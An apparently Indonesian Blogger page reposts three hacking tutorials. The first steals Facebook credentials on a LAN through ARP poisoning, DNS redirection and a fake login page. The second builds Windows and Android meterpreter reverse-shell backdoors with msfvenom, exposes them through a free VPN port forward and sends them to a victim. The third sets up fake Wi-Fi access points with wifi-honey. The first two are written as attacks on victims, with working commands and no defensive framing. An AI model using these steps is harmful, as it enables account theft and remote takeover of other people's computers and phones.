Saturday, 9 September 2017

MITM

Dalam tutorial ini Hacking Facebook Menggunakan MITM saya akan menunjukkan cara hacking Facebook menggunakan MITM (Man In The Middle Attack). Serangan ini biasanya terjadi di dalam Local Area Network (LAN) di kantor, warnet, apartemen, dll

Di bawah ini adalah topologi atau infrastruktur bagaimana MITM kerja, dan bagaimana hal itu dapat terjadi untuk melakukan hacking akun Facebook.


Tutorial Hack Facebook Dengan MITM Attack
Pada gambar di atas, penyerang bertindak sebagai orang penyerang ketiga akan memanipulasi tabel routing yang beralih jadi korban akan berpikir bahwa penyerang adalah Web server dan sebaliknya, karena penyerang telah mengubah tabel routing.
Untuk tutorial ini kita perlu mempersiapkan alat untuk melakukan Bukti Konsep tentang tutorial ini. Di bawah ini Anda dapat men-download.
1. XAMPP - APACHE + PHP + MySQL (Kami menggunakan XAMPP untuk server web facebook palsu kami)
2. Cain & Abel (Kami menggunakannya untuk MITM)
3. Facebook Offline Halaman (saya telah melakukan nulled kode, sehingga script ini tidak akan menghubungi Facebook saat korban mengakses halaman Facebook palsu - hanya menggunakan ini untuk belajar)
Facebook Fake Download
Update: ganti index.php Anda dan login.php menggunakan file berikut Download Disini.
Langkah demi langkah Hacking Facebook Menggunakan Man di Serangan Tengah:
Penyerang IP Address: 192.168.1.11
Korban IP Address: 192.168.1.20
Palsu Web Server: 192.168.1.11
Saya berasumsi Anda berada di Local Area Network sekarang.
1. Instal XAMPP dan menjalankan APACHE dan MySQL layanan
2. Ekstrak fb.rar dan menyalin isi ke C: \ xampp \ htdocs
3. Periksa web server fake dengan browser web dan ketik http: // localhost /
4. Pasang Cain & Abel dan melakukan APR (ARP Poisoning Routing), hanya melihat langkah demi langkah cara di bawah ini.

Pilih antarmuka Anda untuk sniffing dan klik OK. Ketika itu selesai, klik lagi tombol Start / Stop Sniffer untuk mengaktifkan antarmuka sniffing.
Buka tab Sniffer dan kemudian klik + (tanda plus)
Pilih "Semua host di subnet" dan Klik OK.

Anda akan melihat orang-orang lain dalam jaringan Anda, tetapi target saya adalah 192.168.1.12
Setelah kami mendapat semua informasi, klik di bagian bawah aplikasi tab Apr
Klik tombol +, dan ikuti instruksi di bawah ini.
Ketika Anda selesai, sekarang langkah selanjutnya adalah mempersiapkan untuk mengarahkan halaman facebook.com ke web server palsu.
Klik "Apr DNS" dan klik + untuk menambahkan aturan mengarahkan baru.
Ketika semuanya selesai, klik OK. Kemudian langkah berikutnya adalah untuk mengaktifkan Apr dengan mengklik tombol Start / Stop Apr
5. Sekarang Hacking Facebook menggunakan MITM telah diaktifkan. Ini adalah tampilannya seperti ketika korban membuka http://www.facebook.com

Tutorial Hack Facebook Dengan MITM Attack
6. Tapi jika Anda ping nama domain, Anda dapat mengungkapkan bahwa itu palsu, karena alamat IP penyerang bukan alamat ip facebook.

referensi : http://root-creed.blogspot.co.id/2016/02/tutorial-hack-facebook-dengan-mitm.html
Read More ->>

Hack Windows atau Android Beda Jaringan Dengan Metasploit

Hack Windows atau Android Beda Jaringan Dengan Metasploit

Jika sebelumnya saya bahas hack windows  dengan metasploit masih dalam ruang lingkup lokal atau terbatas, tapi kali ini saya akan share tutorial bagaimana Hack Windows atau Android Beda Jaringan Dengan Metasploit yg hanya bermodalkan vpn gratisan dari ipjetable.
Saya buat tutorial ini karena banyak yg menginginkan tutorial ini, karena cukup bermodalkan vpn gratisan saja terutama di grup Kali Linux Indonesia :). Oke langsung saja kita mulai bahas tutorialnya.
Baca juga : 
 Pertama, kita harus menginstall kebutuhan pada desktop kita terlebih dahulu, yaitu vpn nya atau pptp nya dengan mengetikkan perintah berikut diterminal :

apt-get install network-manager-openvpn-gnome
apt-get install network-manager-pptp
apt-get install network-manager-pptp-gnome
apt-get install network-manager-strongswan
apt-get install network-manager-vpnc
apt-get install network-manager-vpnc-gnome
/etc/init.d/network-manager restart

 Setelah menginstall semua kebutuhan untuk exploit ini,
Selanjutnya masuk dulu ke web mytemp.email, bisa klik ===> Disini
Web mytemp.email biasanya digunakan untuk pembuatan email secara instan yg digunakan untuk verifikasi web yg kurang terpercaya.

Setelah masuk web mytemp.email, tinggal klik saja "Start Here", lalu secara otomatis kita sudah mempunyai email instan yg akan kita gunakan pada step berikutnya dibagian daftar di ipjetable.
Atau kita bisa tambah email lagi dengan klik tombol "New Email".

Kemudian kita buka web ipjetablenya untuk mendapatkan vpn yg support port forward yg gratisan :D, oke bisa dibuka dilink berikut ===> Register Ipjetable.net

 Setelah masuk web ipjetable, buka web mytemp.email tadi, lalu copykan email yg sudah jadi di web tersebut, misal hajs@c.kadag.ir, lalu copykan ke kolom register email di ipjetable, lalu isi captcha yg dibagian bawah kolom pengisian email tadi, dan biarkan kosong kolom yg dibawahnya lagi yg bertuliskan 16 letters, lalu klik tombol yg kuning "S'inscrire".

Jika sudah mengklik tombol kuning dan muncul tulisan berwarna hijau yg ada tulisan Merci !, berarti register berhasil, lalu cek email kita di mytemp.email tadi, lalu buka pesan dari ipjetablenya dan jangan klik link dari ipjetable dulu.

Jika sudah membuka email dari ipjetable tadi, copy link yg dikirimkan oleh ipjetable tadi dengan cara tekan klik kanan dibagian linknya, lalu pilih copy link location, lalu buka web ini free-proxy.xyz ===> free-proxy.xyz , lalu pastekan link yg diberikan tadi, lalu hapus link yg dipastekan tadi, misal setelah dipastekan jadinya seperti ini : https://xww.ro/?http://ipjetable.net/api/scr.php?af=0&code=MTQ4NDkwODM3NTp0dHF2QHNpbGl3YW5naS5nYTp0Zmk4MjI4OTg6M3poNDEzMTl6YTo4NjY1NzZhNTkzNDU1YzdjYzRmM2Y5NDhhY2UxZWI2Zg

Maka hapus bagian "https://xww.ro/?" menjadi seperti ini : http://ipjetable.net/api/scr.php?af=0&code=MTQ4NDkwODM3NTp0dHF2QHNpbGl3YW5naS5nYTp0Zmk4MjI4OTg6M3poNDEzMTl6YTo4NjY1NzZhNTkzNDU1YzdjYzRmM2Y5NDhhY2UxZWI2Zg

lalu klik unblock.

Maka kita akan diarahkan ke web ipjetable, disana kita masukkan username dan password sesuai dengan email yg kita terima tadi di mytemp, tinggal copy-paste saja lalu klik connexion, jika sudah konek, tinggal kita hubungkan vpn kita di pc kita dengan meng-klik pilihan diujung kanan atas desktop kita lalu pilih vpn, dan klik vpn setting, lalu akan muncul pengaturan networknya, kita klik icon "+" yg ada dibagian kiri bawah.

1. pilih vpn > Point to point tunneling protocol (PPTP).
2. bisa diberi nama bebas, gateway diisi dengan pptp.ipjetable.com
3. username diisi sesuai dengan yg diterima di email kita
4. password pun sama, diisi sesuai yg diterima di email.
5. lalu klik tombol "Advanced" dan ceklis bagian "use point-to-point encryption"
6. kemudian klik OK dan klik save.

Setelah itu, masuk ke folder network, lokasinya ada di etc/network dan disana ada file bernama interfaces , di interfaces itu kita tambahkan teks berikut dibagian paling bawah :
auto eth0

Kurang lebihnya menjadi seperti ini :

sebaiknya pc kita restart dulu, tp mungkin tidak juga, tidak apa2.
Kemudian konekan lah pc kita ke vpn yg telah dibuat tadi, jika gagal konek, coba sekali lagi konek-an.

Jika sudah terhubung, langsung cek ip+port kita dengan membuka web ini : http://www.canyouseeme.org/

Lalu ip publik kita akan terlihat, nah disana kan ada kolom port, jika kita ingin exploit beda jaringan, kita harus membuka akses port kita. langkahnya :

1. silahkan masukkan port ke kolom port website tadi, masukkanlah port yg akan kita jadikan backdoor pada korban, misal 5555, seperti berikut :
2. Jika sudah memasukkan portnya untuk dicek, klik check port, lalu akan muncul tulisan yg menerangkan bahwa port kita sudah forward atau belum, jika belum akan muncul pesan "Error: I could not see your service on IPPUBLIKKITA on port (5555)",

3. Jika sudah forward, maka akan muncul pesan "Success: I can see your service on IPPUBLIKKITA on port (5555)
Your ISP is not blocking port 5555

4. Untuk mengatasi yg belum forward, pertama masukkan dulu port yg akan kita gunakan, lalu klik check port, nah akan muncul pesan error, misal kita gunakkan port 5555, lalu buka terminal kalian lalu ketikkan perintah berikut :
nc -vlp 5555
Jika sudah mengetikkan perintah tersebut diterminal, lalu coba check port kalian lagi di web tadi, maka pesan error pun akan menjadi sukses, nah tinggal kita buat backdoornya, seperti berikut :

masuk dulu terminal dan ketikkan :

Ini Untuk Windows
msfvenom -p windows/meterpreter/reverse_tcp lhost=ippublikkalian lport=portygtadikitacheck R > namafile.exe

Ini Untuk Android
msfvenom -p android/meterpreter/reverse_tcp lhost=ippublikkalian lport=portygtadikitacheck R > namafile.apk

Setelah membuat backdoor, ketik perintah ini :
msfconsole
Tunggu beberapa saat, lalu setelah masuk msfconsole, ketikkan beberapa perintah berikut :
use multi/handler
Tekan enter, trus untuk windows ketik :
 set payload windows/meterpreter/reverse_tcp

Untuk Android ketik :
set payload android/meterpreter/reverse_tcp

Setelah itu masukkan lhost kita :
set lhost IPPUBLIKSENDIRI

Lalu masukkan lport kita :
set lport PORTYGBERHASILFORWARD

Kemudian tinggal kita exploit :
exploit

Selama proses exploit, kirimkanlah backdoor yg sudah dibuat tadi, dan buka backdoor tersebut, jika android harus kita install terlebih dahulu. Jika sudah dibuka, maka sesi meterpreter-pun terbuka, tinggal kita oprek2 deh tuh korban :D.

 Untuk videonya, bisa dibuka di link ini ===> https://youtu.be/Tjm85cZZ56U



referensi :  http://www.maxteroit.com/2017/01/hack-windows-atau-android-beda-jaringan.html
Read More ->>

cara mengatasi mdk3 pada jaringan wi-fi

Pada postingan kali ini saya akan membahas tentang cara mengatasi mdk3 pada jaringan wi-fi ,
Pastinya anda akan sangat kesal apabila tiba-tiba koneksi wlan anda terputus tanpa sebab, tidak bisa mengkoneksikan lagi ke jaringan wlan yang sama.

Tidak salah lagi, di tempat anda memakai layanan wi-fi pasti ada yang memakai mdk3, istilah keren selain netcut, mdk3 mampu memutus seluruh client yang terhubung pada jaringan wlan.

Konsep kerja MDK3 sendiri adalah mengirim deauth kepada seluruh client yang mengakibatkan client terputus dari jaringan.
Untuk itu saya buat postingan ini untuk membantu para reader mengatasinya,

Alat dan bahan yang harus disiapkan :
1. Sistem Operasi Keamanan.
2. kalau tidak ada anda bisa download paket wifi-honey.

Langkah-Langkah :

1. Jalankan Sistem Operasi Keamanan anda ( saya menggunakan kali linux 1.1.0)
2. Buka terminal,lalu liat interfaces yang akan digunakan untuk memonitor jaringan
- gunakan perintah airmon-ng untuk melihat interaface yang akan digunakan untuk memonitor jaringan.
- di situ akan terlihat interfaces yang akan digunakan untum memonitor jaringan (wlan0)

Cara Mengatasi Pengguna MDK3


3. Mulai memonitor jaringan yang ada di sekitar anda.
- gunakan perintah airodump-ng mon0 untuk memulai monitoring jaringan.

Cara Mengatasi Pengguna MDK3

4. Liat pada bagian yang saya blok : 88:BA:94:5D;97:70
- bagian yang saya blok adalah macaddress dari Access Point, catat BSSID nya ,
Cara Mengatasi Pengguna MDK3

5. Masuk pada direktory wifi-honey, dan konfigurasi pada file wifi_honey_template.rc
- kita akan sedikit mengkonfigurasi file wifi_honey_template.rc

Cara Mengatasi Pengguna MDK3

6. Lihat pada bagian yang saya blok : aa:aa:aa:aa:aa:aa , lalu ganti dengan BSSID wi-fi yang anda monitor tadi.
- perhatikan tulisan yang saya blok, ganti dengan BSSID yang anda catat tadi, ingat yang diganti hanya BSSIDnya , kalau BSSID yang ingin anda masukkan lebih dari 1, ganti BSSID saja.
Cara Mengatasi Pengguna MDK3

7. Jalankan service wifi-honey.
- start service wifi-honey , ketikan perintah wifi-honey <esssid(nama AP)> , seperti pada contoh.
Cara Mengatasi Pengguna MDK3

8. wifi-honey akan melancarkan serangannya,
- lihat disini ada beberapa ESSID palsu yang kita buat, pengguna MDK3 akan berebutan mendapatkan accessnya, intinya kita membuat Acces Point palsu.


Itu tadi cara melawan pengguna MDK3 , namun jangan sering untuk menggunakan ini ataupun menggunakan MDK3 , di postingan selanjutnya saya akan membahas resiko menggunakan MDK3


Referensi : http://aceh.indonesianbacktrack.or.id/2014/01/wifi-honey-simple-defense-from-attack.html
Read More ->>

Total Pageviews

Powered by Blogger.

Translate

About Me

Followers